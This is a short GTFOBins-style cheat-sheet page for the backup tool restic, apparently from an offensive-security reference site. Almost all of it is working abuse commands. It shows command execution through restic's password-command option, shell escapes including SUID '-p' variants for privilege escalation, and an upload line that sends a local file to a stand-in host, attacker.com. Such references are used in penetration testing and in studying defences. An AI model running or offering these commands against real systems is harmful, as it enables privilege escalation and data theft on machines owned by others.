🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🐚 GTFOBins / restic

restic

Command Execution

RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup
restic --password-command='/path/to/command' backup

Shell

RESTIC_PASSWORD_COMMAND='/bin/sh -c "/bin/sh 0<&2 1<&2"' restic backup

SUID override:

RESTIC_PASSWORD_COMMAND='/bin/sh -p -c "/bin/sh -p 0<&2 1<&2"' restic backup
restic --password-command='/bin/sh -c "/bin/sh 0<&2 1<&2"' backup

SUID override:

restic --password-command='/bin/sh -p -c "/bin/sh -p 0<&2 1<&2"' backup

Upload

restic backup -r rest:http://attacker.com:12345/x /path/to/input-file